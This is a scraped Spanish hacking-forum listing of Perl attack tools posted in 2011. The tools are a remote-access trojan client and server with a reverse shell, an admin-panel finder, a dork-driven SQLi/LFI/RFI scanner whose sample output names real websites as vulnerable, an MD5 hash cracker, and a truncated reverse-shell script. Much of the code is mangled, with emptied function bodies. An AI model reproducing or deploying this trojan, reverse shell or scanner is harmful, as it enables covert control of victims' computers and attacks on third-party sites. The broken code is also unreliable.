|
381
|
Programación / Scripting / [Perl] Troyano Nefaster
|
en: 9 Octubre 2011, 17:47 pm
|
Bueno es es mi troyano Nefaster , en esta version le arregle varias cosas que pasare a detallar - Mostrar Informacion
- Navegador de archivos
- Cambiar directorio de navegacion
- Crear archivo
- Borrar archivo
- Borrar directorio
- Reproducir musica o videos poniendo la ruta en la opcion
- Parar reproduccion
- Abrir lectora de CD
- Cerrar lectora de CD
- Puertos abiertos
- Mensaje
- Ejecutar comandos
- Esconder barra de tareas
- Devolver barra de tareas
- Esconder iconos del escritorio
- Devolver iconos del escritorio
- Administrar procesos con posibilidad de cerrar el que quieran
- Reverse Shell si es que quieren ejecutar comandos de forma mas comoda
El codigo del cliente es este #!usr/bin/perl #Nefester (Cliente) 0.1 By Doddy H use IO::Socket; use Cwd; &menu; sub head { E F TT E NNNNNNNEEEEEE FFFFFF AAA SSSSSTTTTTTEEEEEE RRRRRR NN NN E EE FFFF A AA S S T TT T E EE RRRRR NNNNN E EE FF F AAAAA S T TT E EE RR R NNNNN EEEEE FFFFF AAA AA SSS S TT EEEEE RRRRR NNNNN E EEE FFF AAAAA S SSS TT E EEE RR R NN NN EEEE E FF AAA AA SS SS TT EEEE E RR R NNN NN EEEEEEEFFFF AAA AAA SSS TTTT EEEEEEE RRR RR SS R R ); } sub menu { &head; my $socket = new IO::Socket::INET( PeerAddr => $ip, PeerPort => 666, Proto => 'tcp', Timeout => 5 ); if ($socket) { $socket->close; &menuo($ip); } else { print "\n\n[-] Target no infectado\n"; <STDIN>; &menu; } } sub menuo { &head; print "[$_[0]] : Servidor Activado\n\n"; 1 : Informacion 2 : Navegador 3 : Abrir CD 4 : Cerrar CD 5 : Puertos abiertos 6 : Mensaje 7 : CMD 8 : Esconder barra de tareas 9 : Devolver barra de tareas 10 : Esconder iconos 11 : Devolver iconos 12 : Administrar procesos 13 : Reverse Shell 14 : Cambiar IP 15 : Salir ); chomp(my $opcion = <STDIN>); if ($opcion eq 1) { print "\n\n[+] Informacion\n\n"; $re = daryrecibir($_[0],"infor"); if ($re=~/:(.*):(.*):(.*):(.*):(.*):/) { print "[Dominio] : $1\n"; print "[Version] : $3\n"; <stdin>; } &menuo($_[0]); } elsif ($opcion eq 2) { menu1: print "\n\n[+] Navegacion de archivos\n\n"; $cwd = daryrecibir($_[0],"getcwd"."\r\n"); show($_[0],"/"); &menu2; sub menu2 { print "\n\n[Opciones]\n\n"; print "1 - Cambiar directorio\n"; print "2 - Crear archivo\n"; print "3 - Borrar archivo\n"; print "4 - Borrar directorio\n"; print "5 - Reproducir musica\n"; print "6 - Parar reproduccion\n"; print "7 - Volver al menu inicial\n\n"; if ($op eq 1) { print "\n\n[+] Directorio : "; $ver = daryrecibir($_[0],"chdirnow K0BRA".$dir."K0BRA"); if ($ver=~/ok/ig) { print "\n\n[+] Directory changed\n\n"; } show($_[0],$dir); &menu2; <stdin>; } elsif ($op eq 2) { chomp(my $name = <stdin>); print "\n\n[Contenido] : "; chomp(my $code = <stdin>); daryrecibir($_[0],"crearnow K0BRA".$name."K0BRA ACATOY".$code."ACATOY"); print "\n\n[+] Archivo creado \n\n"; <stdin>; } elsif ($op eq 3) { print "\n\n[Archivo a borrar] : "; chomp(my $file = <stdin>); $re = daryrecibir($_[0],"borrarfile K0BRA".$file."K0BRA"); if ($re=~/ok/) { print "\n\n[+] Archivo Borrado\n\n"; } else { print "\n\n[-] Error\n\n"; } <stdin>; } elsif ($op eq 4) { print "\n\n[Directorio a borrar] : "; chomp(my $file = <stdin>); $re = daryrecibir($_[0],"borrardir K0BRA".$file."K0BRA"); if ($re=~/ok/) { print "\n\n[+] Directorio Borrado\n\n"; } else { print "\n\n[-] Error\n\n"; } <stdin>; } elsif ($op eq 5) { print "\n\n[Archivo] : "; chomp(my $file = <stdin>); print "\n\n[+] Reproduciendo\n\n"; daryrecibir($_[0],"playmusic K0BRA".$file."K0BRA"); <stdin>; } elsif ($op eq 6) { print "\n\n[+] Reproduccion detenida\n\n"; daryrecibir($_[0],"pararmusic"); <stdin>; } elsif ($op eq 7) { &menuo($_[0]); } else { show($_[0],"/"); } } } elsif ($opcion eq 3) { daryrecibir($_[0],"opencd"); &menuo($_[0]); } elsif ($opcion eq 4) { daryrecibir($_[0],"closedcd"); &menuo($_[0]); } elsif ($opcion eq 5) { print "\n[Puertos Abiertos]\n\n"; $re = daryrecibir($_[0],"porters"); while ($re=~/:(.*?):/ig) { if ($1 ne "") { } } <stdin>; &menuo($_[0]); } elsif ($opcion eq 6) { chomp (my $msg = <stdin>); daryrecibir($_[0],"msgbox $msg"); <stdin>; &menuo($_[0]); } elsif ($opcion eq 7) { menu: my $cmd,$re; &menuo($_[0]); } $re = daryrecibir($_[0],"comando :$cmd:"); &menuo($_[0]); } elsif ($opcion eq 8) { daryrecibir($_[0],"iniciochau"); &menuo($_[0]); } elsif ($opcion eq 9) { daryrecibir($_[0],"iniciovuelve"); &menuo($_[0]); } elsif ($opcion eq 10) { daryrecibir($_[0],"iconochau"); &menuo($_[0]); } elsif ($opcion eq 11) { daryrecibir($_[0],"iconovuelve"); &menuo($_[0]); } elsif ($opcion eq 12) { &reload($_[0]); sub reload { my @pro; my @pids; my $sockex = new IO::Socket::INET( PeerAddr => $_[0], PeerPort => 666, Proto => 'tcp', Timeout => 5 ); print $sockex "mostrarpro"."\r\n"; $sockex->read($re,5000); $sockex->close; print "\n\n[+] Procesos encontrados\n\n"; while ($re=~/PROXEC(.*?)PROXEC/ig) { if ($1 ne "") { } } while ($re=~/PIDX(.*?)PIDX/ig) { if ($1 ne "") { } } for my $num(1..$cantidad) { if ($pro[$num] ne "") { print "\n[+] Proceso : ".$pro[$num]."\n"; print "[+] PIDS : ".$pids[$num]."\n"; } } [Opciones] 1 - Refrescar lista 2 - Cerrar procesos 3 - Volver al menu ); chomp(my $opc = <stdin>); if ($opc=~/1/ig) { &reload($_[0]); } elsif($opc=~/2/ig) { print "\n[+] Write the name of the process : "; chomp(my $numb = <stdin>); print "\n[+] Write the PID of the process : "; chomp(my $pid = <stdin>); $re = daryrecibir($_[0],"chauproce K0BRA".$pid."K0BRA".$numb."K0BRA"); if ($re=~/ok/ig) { print "\n\n[+] Proceso cerrado\n\n"; } else { print "\n\n[-] Error\n\n"; } <stdin>; &reload($_[0]); } elsif($opc=~/3/ig) { &menuo($_[0]); } else { &reload; } } } elsif ($opcion eq 13) { chomp(my $port = <stdin>); print "\n\n[+] Connected !!!\n\n"; $re = daryrecibir($_[0],"backshell :$ip:$port:"); } elsif ($opcion eq 14) { &menu; } elsif ($opcion eq 15) { } else { &menuo; } } sub daryrecibir { my $sockex = new IO::Socket::INET( PeerAddr => $_[0], PeerPort => 666, Proto => 'tcp', Timeout => 5 ); print $sockex $_[1]."\r\n"; $sockex->read($re,5000); $sockex->close; } sub show { my $re = daryrecibir($_[0],"getcwd"."\r\n"); print "\n\n[+] Directorio Actual : $re\n\n"; $re1 = daryrecibir($_[0],"dirnow ACATOY".$re."ACATOY"."\r\n"); print "\n\n[Directorios]\n\n"; while ($re1=~/DIREX(.*?)DIREX/ig) { if ($1 ne "") { } } print "\n\n[Archivos]\n\n"; while ($re1=~/FILEX(.*?)FILEX/ig) { if ($1 ne "") { } } } # # ¿ The End ? #
Y el server #!/usr/bin/perl #Nefester (sERVidor) 0.1 By Doddy H #Compilar con perl2exe para sacar consola use IO::Socket; use Socket; use Win32; use Cwd; use Win32::MediaPlayer; use Win32::Process::List; use Win32::Process; use Win32::API; use constant SW_HIDE => 0; use constant SW_SHOWNORMAL => 1; my $a = new Win32::API('user32', 'FindWindow', 'PP', 'N'); my $b = new Win32::API('user32', 'ShowWindow', 'NN', 'N'); $test = new Win32::MediaPlayer; my $sock = IO::Socket::INET->new(LocalPort => 666, Listen => 10, Proto => 'tcp', Reuse => 1); while (my $con = $sock->accept){ $resultado = <$con>; print "boludo mando : $resultado\n"; if ($resultado=~/msgbox (.*)/ig) { Win32::MsgBox($1,0,"Mensaje de Dios") } if ($resultado=~/backshell :(.*):(.*):/ig) { my ($ip,$port) = ($1,$2); print "conectando $ip con $port\n"; conectar($ip,$port); tipo(); sub conectar { connect(REVERSE , sockaddr_in ($_[1],inet_aton ($_[0]))); open (STDIN,">&REVERSE"); open (STDOUT,">&REVERSE"); open (STDERR,">&REVERSE"); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ($^O =~/Win32/ig) { infowin(); } else { infolinux(); #root(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "[+] Domain Name : ".Win32 ::DomainName()."\n"; print "[+] OS Version : ".Win32 ::GetOSName()."\n"; print "[+] Username : ".Win32 ::LoginName()."\n\n\n"; } sub infolinux { print "[+] System information\n\n"; } } if ($resultado =~/opencd/ig) { use Win32::API; my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N"); my $rta = ' ' x 127; $ventana->Call('set CDAudio door open', $rta, 127, 0); } if ($resultado=~/chauproce K0BRA(.*)K0BRA(.*)K0BRA/ig) { my ($pid,$numb) = ($1,$2); if (Win32::Process::KillProcess($pid,$numb)) { } } if ($resultado =~/closedcd/ig) { use Win32::API; my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N"); my $rta = ' ' x 127; $ventana->Call('set CDAudio door closed', $rta, 127, 0); } if ($resultado=~/borrarfile K0BRA(.*)K0BRA/ig) { my $filex = $1; print getcwd ()."/".$filex."\n\n"; if (unlink(getcwd ()."/".$filex)) { } } if ($resultado=~/infor/ig) { use Win32; my $domain = Win32::DomainName(); my $chip = Win32::GetChipName(); my $version = Win32::GetOSVersion(); my $nombre = Win32::LoginName(); my $os = Win32::GetOSName(); print $con ":".$domain.":".$chip.":".$version.":".$nombre.":".$os.":"."\r\n"; } if ($resultado=~/porters/ig) { use Net::Netstat::Wrapper; $por = ""; @ports = Net::Netstat::Wrapper->only_port(); for(@ports) { $por = $por.":".$_; } } if ($resultado=~/playmusic K0BRA(.*)K0BRA/ig) { my $cancion = $1; $test->load($cancion); $test->play; } if ($resultado=~/chdirnow K0BRA(.*)K0BRA/ig) { my $dir = $1; } } if ($resultado=~/borrardir K0BRA(.*)K0BRA/ig) { my $veox = $1; if (rmdir(getcwd ()."/".$veox)) { } } if ($resultado=~/pararmusic/ig) { $test->close; } if ($resultado=~/dirnow ACATOY(.*)/ig) { my $real = $1; my @archivos = coleccionar($real); for (@archivos) { my $todo = $real."/".$_; if (-f $todo) { print $con "FILEX".$_."FILEX"."\r\n"; } if (-d $todo) { print $con "DIREX".$_."DIREX"."\r\n"; } } } sub coleccionar { } if ($resultado=~/getcwd/ig) { print "envie ".getcwd ()."\n\n"; print $con getcwd ()."\r\n"; } if ($resultado=~/mostrarpro/ig) { my $new = Win32::Process::List->new(); my %process = $new->GetProcesses(); for my $pid (keys %process) { print $con "PROXEC".$process{$pid}."PROXEC\r\n"; print $con "PIDX".$pid."PIDX\r\n"; } } if ($resultado=~/crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY/ig) { my $name = $1; my $file = $2; print "name is $name end\n"; print "file is $file end\n"; } if ($resultado=~/comando :(.*):/ig) { print "llego comando $1\n"; } if ($resultado=~/iniciochau/g) { inicio_chau("Shell_TrayWnd"); } if ($resultado=~/iniciovuelve/g) { inicio_vuelve("Shell_TrayWnd"); } else { } if ($resultado=~/iconovuelve/g) { icono_vuelve("Program Manager"); } if ($resultado=~/iconochau/g) { icono_chau("Program Manager"); } sub icono_vuelve { $handle = $a->Call(0,$_[0]); $b->Call($handle,SW_SHOWNORMAL); } sub icono_chau { $handle = $a->Call(0,$_[0]); $b->Call($handle,SW_HIDE); } sub inicio_vuelve { $handlex = $a->Call($_[0],0); $b->Call($handlex,SW_SHOWNORMAL); } sub inicio_chau { $handlea = $a->Call($_[0],0); $b->Call($handlea,SW_HIDE); } } # ¿ The End ?
|
|
|
382
|
Programación / Scripting / [Perl] Panel Control 0.6
|
en: 8 Octubre 2011, 16:57 pm
|
La nueva version de esta herramienta para buscar el panel de administracion #!usr/bin/perl #Panel Control 0.6 #(C) Doddy Hackman 2011 use LWP::UserAgent; @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx' ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx' ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx' ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx' ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx' ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx' ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp' ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx' ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php' ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php' ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php' ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php' ,'administration/','administration/index.php','administration/login.php' ,'administrator/index.php','administrator/login.php','administrator/system.php','system/' ,'system/login.php','admin.php','login.php','administrador.php','administration.php' ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php' ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html' ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html' ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html' ,'administrator/','administrator/index.html','administrator/login.html' ,'administrator/account.html','administrator/account.php','administrator.html','login.html' ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php' ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/' ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html' ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp' ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp' ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp' ,'administrator/login.asp','administrator/account.asp','administrator.asp' ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp' ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/' ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php' ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp' ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html' ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html' ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp' ,'webadmin.html','administratie/','admins/','admins.php','admins.asp' ,'admins.html','administrivia/','Database_Administration/','WebAdmin/' ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/' ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/' ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/' ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/ ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/ ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/ ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/ ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/' ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/' ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/' ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/' ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/' ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/' ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/' ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/' ,'server/','database_administration/','power_user/','system_administration/' ,'ss_vms_admin_sm/'); my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); unless($ARGV[0]) { print "\n\n[+] sintax : $0 <web>\n\n"; } else { scan($ARGV[0]); } copyright(); sub scan { print "\n[+] Scanning $_[0]\n\n\n"; for $path(@panels) { $code = toma($_[0]."/".$path); if ($code->is_success) { print "[Link] : ".$_[0]."/".$path."\n"; } } } sub head { print "\n\n-- == Panel Control == --\n\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; } sub toma { } #Thanks to explorer (PerlEnEspañol) # ¿ The End ?
|
|
|
383
|
Programación / Scripting / [Perl] Paranoic Scan By Doddy H
|
en: 8 Octubre 2011, 16:56 pm
|
Hola. Hoy traigo un programa que eh estado haciendo porque estaba harto de ir probando cada web que encontraba en google para saber si tenia la vulnerabilidad que queria Asi que por eso hice esta tool , con las siguientes opciones * Permite scaner un archivo con webs * Permite buscar en google , borrar repes , y luego scanear Tipos de scan : * SQL * LFI * RFI * FULL SOURCE DISCLOURE Ejemplo de uso
@@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @
[a] : Scan a File [b] : Search in google and scan the webs
[option] : b
[+] Dork : ficha.php+id [+] Pages : 200
[+] Scan Type :
[S] : SQL [L] : LFI [R] : RFI [F] : Full Source Discloure [A] : All
[Option] : s
[Google] : www.google.com.ar [Dork] : ficha.php+id [Pages] : 200
[+] Searching pages.. [+] Cleaning results
[Status] : Scanning [Webs Count] : 136
[+] SQLI : http://www.3tres3.com/opinion/ficha.php?id= [+] SQLI : http://www.vincipark.es/ficha.php?id= [+] SQLI : http://www.maxhuber.cl/ficha.php?id= [+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id= [+] SQLI : http://www.bvocal.org/ficha.php?id= [+] SQLI : http://www.animadas.com/artista-ficha.php?id= [+] SQLI : http://www.madamedepompadour.cl/ficha.php?id= [+] SQLI : http://codigo-civil.org/base/ficha.php?id= [+] SQLI : http://www.cibercolchon.com/ficha.php?id= [+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID= [+] SQLI : http://www.nibbledpencil.com/ficha.php?id=
[Status] : Finish
(C) Doddy Hackman 2010
Codigo #!usr/bin/perl #Paranoic Scan 0.4 #(c)0ded by Doddy H 2010 use LWP::UserAgent; use HTTP::Request::Common; use URI ::Split qw(uri_split ); my $nave = LWP::UserAgent->new(); $nave->timeout(5); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); sub head { @@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @ ); } &menu; sub menu { &head; print "[a] : Scan a File\n"; print "[b] : Search in google and scan the webs\n\n"; if ($op=~/a/ig) { print "\n[+] Wordlist : "; chomp(my $word = <STDIN>); @paginas = repes(savewords($word)); my $option = &men; scan($option,@paginas); } elsif ($op=~/b/ig) { chomp(my $dork = <STDIN>); chomp(my $pag = <STDIN>); my $option = &men; @paginas = &google("www.google.com.ar",$dork,$pag); scan($option,@paginas); } else { &menu; } } sub scan { my ($option,@webs) = @_; print "\n[Status] : Scanning\n"; print "[Webs Count] : ".int(@webs)."\n\n"; for(@webs) { if ($option=~/S/ig) { &sql($_); } if ($option=~/L/ig) { &lfi($_); } if ($option=~/R/ig) { &rfi($_); } if ($option=~/F/ig) { &fsd($_); } if ($option=~/A/ig) { &sql($_); &lfi($_); &rfi($_); &fsd($_) } } } print "\n[Status] : Finish\n"; &finish; sub toma { return $nave->request (GET $_[0])->content; } sub savefile { open (SAVE ,">>logs/".$_[0]); } sub finish { print "\n\n\n(C) Doddy Hackman 2010\n\n"; <STDIN>; } sub google { print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n"; for ($pages=0;$pages<=$_[2];$pages=$pages+10) { $response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages"); while ($response=~m/<h3 class =.*?<a href ="([^"]+).*?>(.*?)<\ /a >/g ) { }} print "[+] Cleaning results\n"; for(@founds) { $t = clean($_); } } sub sql { my ($pass1,$pass2) = ("+","--"); $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "[+] SQLI : $page\a\n"; savefile("sql-logs.txt",$page); }} sub rfi { $code1 = toma($page."http:/www.supertangas.com/"); if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD print "[+] RFI : $page\a\n"; savefile("rfi-logs.txt",$page); }} sub lfi { $code1 = toma($page."'"); if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) { print "[+] LFI : $page\a\n"; savefile("lfi-logs.txt",$page); }} sub fsd { my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $me = $1; $code1 = toma($page.$me); if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) { print "[+] Full Source Discloure : $page\a\n"; savefile("fpd-logs.txt",$page); }}} sub repes { foreach my $palabra ( @_ ) { next if $repety{ $palabra }++; } } sub savewords { @words = <FILE>; for(@words) { $t = clean($_); } } sub men { print "\n\n[+] Scan Type : \n\n"; print "[F] : Full Source Discloure\n"; chomp(my $option = <STDIN>); } sub clean { if ($_[0] =~/\=/) { my @sacar= split("=",$_[0]); } } #The End #Contact : doddy-hackman[at]hotmail[com] #blog : doddy-hackman.blogspot.com
|
|
|
384
|
Programación / Scripting / [Perl] Pass Cracker By Doddy H
|
en: 8 Octubre 2011, 16:56 pm
|
Hola , aca les dejo un simple programa para buscar la decodificacion de un hash md5 #!usr/bin/perl #Pass Cracker 1.0 #(C) Doddy Hackman 2011 use LWP::UserAgent; my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); unless($ARGV[0]) { print "\n\n[+] sintax : $0 <hash>\n\n"; } else { crackit($ARGV[0]); } copyright(); sub crackit { print "\n[+] Cracking $_[0]\n\n"; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables'=>'{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', 'regex' => qq(<\ /div ><div class ="result">$_[0]:(.+)<br\ />), }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', 'regex' => qq(MD5 ðàñøèôðîâàí : <b>(.*)<\ /b ><br><form action =\ "\">), } ); for my $data(keys %hash) { if ($hash{$data}{tipo} eq "get") { $code = toma($data.$_[0]); if ($code=~/$hash{$data}{regex}/ig) { print "\n[+] Decoded : ".$1."\n\n"; } } else { $code = tomar($data,$hash{$data}{variables}); if ($code=~/$hash{$data}{regex}/ig) { print "\n[+] Decoded : ".$1."\n\n"; } } } print "\n[+] Finish\n"; } sub head { print "\n\n-- == Pass Cracker == --\n\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; exit(1); } sub toma { return $nave->get($_[0])->content; } sub tomar { my ($web,$var) = @_; return $nave->post($web,[%{$var}])->content; } #Thanks to explorer (PerlEnEspañol) # ¿ The End ?
Ejemplo de uso
|
|
|
385
|
Programación / Scripting / [Perl] PasteBin Uploader
|
en: 8 Octubre 2011, 16:55 pm
|
Bueno aca eh terminado un programa que los ayudara a publicar sus programas en pastebin de una forma rapida y sin ganas xDDD Entonces , este programa tiene dos opciones : - Publica solo un archivo
- Publica todos los archivos en un directorio
Tambien detecta el tipo de extension para poder publicar el codigo en su respectivo tipo de codigo #!usr/bin/perl #Paste Bin Uploader (C) Doddy Hackman 2011 use LWP::UserAgent; use HTTP::Request::Common; my $nave = LWP::UserAgent->new(); $nave->timeout(10); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); menu(); sub menu { clean(); header(); print "\n\n[Options]\n\n"; print "[1] : Upload a file\n"; print "[2] : Upload a directory\n"; if ($op eq 1) { chomp(my $file = <stdin>); if (-f $file) { ($name,$exta) =verfile($file); my $ext = extensiones($exta); if ($ext ne "Yet") { $code = openfile($file); $re = lleva($name,$code,$ext); print "\n\n[+] File : $file\n"; print "[+] Link : ".$re."\n"; savefile("uploads_paste.txt","\n[+] File : $file"); savefile("uploads_paste.txt","[+] Link : ".$re); } } else { print "\n\n[-] Error\n\n"; } reload(); } elsif ($op eq 2) { print "\n\n[Directory] : "; chomp(my $dir = <stdin>); if (-d $dir) { my @files = verdir($dir); print "\n\n[+] Loading directory\n"; for my $file(@files) { my ($name,$exta) =verfile($file); my $ext = extensiones($exta); if ($ext ne "Yet") { my $code = openfile($dir."/".$file); $re = lleva($name,$code,$ext); print "\n\n[+] File : $file\n"; print "[+] Link : ".$re."\n"; savefile("uploads_paste.txt","\n[+] File : $file"); savefile("uploads_paste.txt","[+] Link : ".$re); } } } else { print "\n\n[-] Error\n\n"; } reload(); } elsif ($op eq 3) { copyright(); <stdin>; } else { menu(); } } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; } sub header { PPPP AA SSSSTTTTTTEEEE BBBB II NN NN UU UU PPPP PP PP AA SS S TT EE BB BB II NNN NN UU UU PP PP PP PP AAAA SS TT EE BB BB II NNNN NN UU UU PP PP PPPP A A SSS TT EEEE BBBB II NN N NN UU UU PPPP PP AAAAAA SS TT EE BB BB II NN NNNN UU UU PP PP AA AA S SS TT EE BB BB II NN NNN UUUUUU PP PP AA AA SSSS TT EEEE BBBB II NN NN UUUU PP ); } sub clean { } sub verdir{ my @archivos; for (@archivos) { if (-f $_[0]."/".$_) { } } } sub verfile { if ($_[0]=~/(.*)\.(.*)/ig) { } } sub extensiones { if ($_[0] =~/py/ig) { $code = "python"; } elsif ($_[0] =~/pl/ig) { $code = "perl"; } elsif ($_[0] =~/rb/ig) { $code = "ruby"; } elsif ($_[0] =~/php/ig) { $code = "php"; } elsif ($_[0] =~/txt/ig) { $code = ""; } else { $code = "Yet"; } } sub reload { print "\n\n[?] Enter for continue\n\n"; <stdin>; menu(); } sub savefile { open (SAVE ,">>logs/".$_[0]); } sub openfile { my $r; @wor = <FILE>; for(@wor) { $r.= $_; } } sub lleva { return $nave->post('http://pastebin.com/api_public.php',{ paste_code => $_[1],paste_name => $_[0],paste_format =>$_[2],paste_expire_date =>'N',paste_private =>"public",submit =>'submit'})->content; } # ¿ The End ?
|
|
|
386
|
Programación / Scripting / [Perl] Reverse Shell By Doddy
|
en: 8 Octubre 2011, 16:55 pm
|
Hola a todos. Hoy traigo un simple reverse shell en esta version solo pueden conectarse al server que tiene netcat despues ofrece informacion depende del sistema operativo que tiene el que ejecuto el script. En la version 0.2 le agregare deteccion de kernel y su posible exploit. #!usr/bin/perl #Reverse Shell 0.1 #By Doddy H use IO::Socket; print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n"; unless (@ARGV == 2) { print "[Sintax] : $0 <host> <port>\n\n"; } else { print "[+] Starting the connection\n"; print "[+] Enter in the system\n"; print "[+] Enjoy !!!\n\n"; conectar($ARGV[0],$ARGV[1]); tipo(); } sub conectar { connect(REVERSE , sockaddr_in ($_[1],inet_aton ($_[0]))); open (STDIN,">&REVERSE"); open (STDOUT,">&REVERSE"); open (STDERR,">&REVERSE"); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ($^O =~/Win32/ig) { infowin(); } else { infolinux(); #root(); } } sub infowin { print "[+] Domain Name : ".Win32 ::DomainName()."\n"; print 